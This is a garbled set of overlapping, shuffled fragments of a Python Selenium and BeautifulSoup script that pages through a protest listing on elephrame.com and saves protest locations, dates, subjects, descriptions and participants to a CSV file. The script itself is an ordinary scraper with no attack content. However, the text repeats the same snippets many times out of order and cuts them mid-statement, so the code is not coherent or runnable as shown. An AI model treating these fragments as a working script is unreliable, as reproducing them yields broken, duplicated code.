"import codecs from bs4 import BeautifulSoup from selenium import webdriver from time import",
"into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time",
"= driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to numeric pagenum =",
"c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text,",
"< page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't",
"#Instructions from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s #How to open python in command prompt: #1) Shift+Right Click",
"bs4 import BeautifulSoup from selenium import webdriver from time import sleep # access",
"#1) Shift+Right Click -> open command prompt #2) type \"conda activate\" #3) type",
"#2) type \"conda activate\" #3) type \"python\" #To run the python script, type",
"= 1 pagenum = -1 while(pagenum < page_new): #click to next page if",
"driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to numeric pagenum = pagenum",
"\"conda activate\" #3) type \"python\" #To run the python script, type the following",
"website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv",
"filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date,",
"10) #coverts from string to numeric pagenum = pagenum + 1 # append",
"\"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all pages page_new",
"-1 while(pagenum < page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click()",
"b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description:",
"participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c,",
"sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2)",
"run the python script, type the following line into the command prompt: #python",
"codecs from bs4 import BeautifulSoup from selenium import webdriver from time import sleep",
"# import packages import time import itertools import csv import codecs from bs4",
"overflow website sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new",
"string to numeric pagenum = pagenum + 1 # append data from this",
"= driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d,",
"through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename",
"\"python\" #To run the python script, type the following line into the command",
"dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\"",
"website sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new =",
"= codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) #",
"page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to numeric pagenum",
"Shift+Right Click -> open command prompt #2) type \"conda activate\" #3) type \"python\"",
"page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow",
"# loop clicks over all pages page_new = 1 pagenum = -1 while(pagenum",
"pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers for",
"don't overflow website sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\")",
"type the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" #",
"Files\\webscrape.py\" # import packages import time import itertools import csv import codecs from",
"-1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers for while statement",
"import webdriver from time import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\"",
"encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks",
"\",\" + e.text + \"\\n\") # close browser driver.quit() # close csv file",
"append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants =",
"driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\")",
"open python in command prompt: #1) Shift+Right Click -> open command prompt #2)",
"pagenum + 1 # append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates",
"Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all pages page_new =",
"= driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects =",
"driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8',",
"from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s #How to open python in command prompt: #1) Shift+Right Click ->",
"locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects",
"type \"python\" #To run the python script, type the following line into the",
"Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all pages page_new = 1",
"next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update",
"for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text,",
"command prompt #2) type \"conda activate\" #3) type \"python\" #To run the python",
"if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers",
"b, c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text,",
"zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") +",
"prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import itertools import",
"= driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a,",
"driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations, dates,",
"Click -> open command prompt #2) type \"conda activate\" #3) type \"python\" #To",
"subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" +",
"\",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\")",
"chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM",
"pagenum = -1 while(pagenum < page_new): #click to next page if pagenum >",
"#click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website",
"page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page",
"from selenium import webdriver from time import sleep # access website through automated",
"time import itertools import csv import codecs from bs4 import BeautifulSoup from selenium",
"= pagenum + 1 # append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\")",
"# access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) #",
"codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop",
"> -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers for while",
"descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in",
"d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text)",
"descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\",",
"\"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") # close browser driver.quit() #",
"all pages page_new = 1 pagenum = -1 while(pagenum < page_new): #click to",
"loop clicks over all pages page_new = 1 pagenum = -1 while(pagenum <",
"chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\"",
"statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to numeric",
"= -1 while(pagenum < page_new): #click to next page if pagenum > -1:",
"driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e)",
"int(page_new, 10) #coverts from string to numeric pagenum = pagenum + 1 #",
"\"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") +",
"+ b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\",",
"f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers)",
"csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location,",
"line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import",
"e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s):",
"\",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" +",
"command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import itertools",
"c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" +",
"#How to open python in command prompt: #1) Shift+Right Click -> open command",
"print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") +",
"= driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions,",
"activate\" #3) type \"python\" #To run the python script, type the following line",
"dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for",
"python in command prompt: #1) Shift+Right Click -> open command prompt #2) type",
"= \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject,",
"to open python in command prompt: #1) Shift+Right Click -> open command prompt",
"b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\"",
"+ 1 # append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates =",
"automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename =",
"#python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import itertools import csv",
"(a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text,",
"https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s #How to open python in command prompt: #1) Shift+Right Click -> open",
"d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") # close browser driver.quit()",
"import packages import time import itertools import csv import codecs from bs4 import",
"= \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all pages",
"open command prompt #2) type \"conda activate\" #3) type \"python\" #To run the",
"numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from",
"save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers =",
"+ e.text + \"\\n\") # close browser driver.quit() # close csv file f.close()",
"to numeric pagenum = pagenum + 1 # append data from this click",
"the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import",
"f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\")",
"python script, type the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do",
"#To run the python script, type the following line into the command prompt:",
"= int(page_new, 10) #coverts from string to numeric pagenum = pagenum + 1",
"import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM')",
"while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to",
"from string to numeric pagenum = pagenum + 1 # append data from",
"mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over",
"BeautifulSoup from selenium import webdriver from time import sleep # access website through",
"\",\"\") + \",\" + e.text + \"\\n\") # close browser driver.quit() # close",
"1 # append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\")",
"prompt #2) type \"conda activate\" #3) type \"python\" #To run the python script,",
"d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\",",
"sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+')",
"# save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers",
"= webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f =",
"the python script, type the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police",
"script, type the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\"",
"\"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description,",
"in command prompt: #1) Shift+Right Click -> open command prompt #2) type \"conda",
"import time import itertools import csv import codecs from bs4 import BeautifulSoup from",
"\",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") # close",
"the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import",
"import itertools import csv import codecs from bs4 import BeautifulSoup from selenium import",
"e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\",",
"selenium import webdriver from time import sleep # access website through automated chrome",
"pages page_new = 1 pagenum = -1 while(pagenum < page_new): #click to next",
"+ \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") #",
"command prompt: #1) Shift+Right Click -> open command prompt #2) type \"conda activate\"",
"access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save",
"for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string",
"\",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\"",
"#3) type \"python\" #To run the python script, type the following line into",
"itertools import csv import codecs from bs4 import BeautifulSoup from selenium import webdriver",
"to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2)",
"+ \",\" + b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\"",
"+ d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text + \"\\n\") # close browser",
"time import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path)",
"clicks over all pages page_new = 1 pagenum = -1 while(pagenum < page_new):",
"prompt: #1) Shift+Right Click -> open command prompt #2) type \"conda activate\" #3)",
"over all pages page_new = 1 pagenum = -1 while(pagenum < page_new): #click",
"following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages",
"webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename,",
"pagenum = pagenum + 1 # append data from this click locations =",
"in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\")",
"+ \",\" + e.text + \"\\n\") # close browser driver.quit() # close csv",
"from time import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver =",
"this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions =",
"driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename = \"../Data/BLM Protests/protests_scrape.csv\" f",
"data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\")",
"import BeautifulSoup from selenium import webdriver from time import sleep # access website",
"from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions",
"sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new,",
"+ \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") +",
"headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all",
"driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b,",
"f.write(headers) # loop clicks over all pages page_new = 1 pagenum = -1",
"Description, Participants\\n\" f.write(headers) # loop clicks over all pages page_new = 1 pagenum",
"-> open command prompt #2) type \"conda activate\" #3) type \"python\" #To run",
"type \"conda activate\" #3) type \"python\" #To run the python script, type the",
"from bs4 import BeautifulSoup from selenium import webdriver from time import sleep #",
"Killings\\Do Files\\webscrape.py\" # import packages import time import itertools import csv import codecs",
"driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers for while statement page_new",
"page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts",
"\"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text +",
"click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\")",
"subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations, dates, subjects,",
"csv import codecs from bs4 import BeautifulSoup from selenium import webdriver from time",
"\"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\")"
] |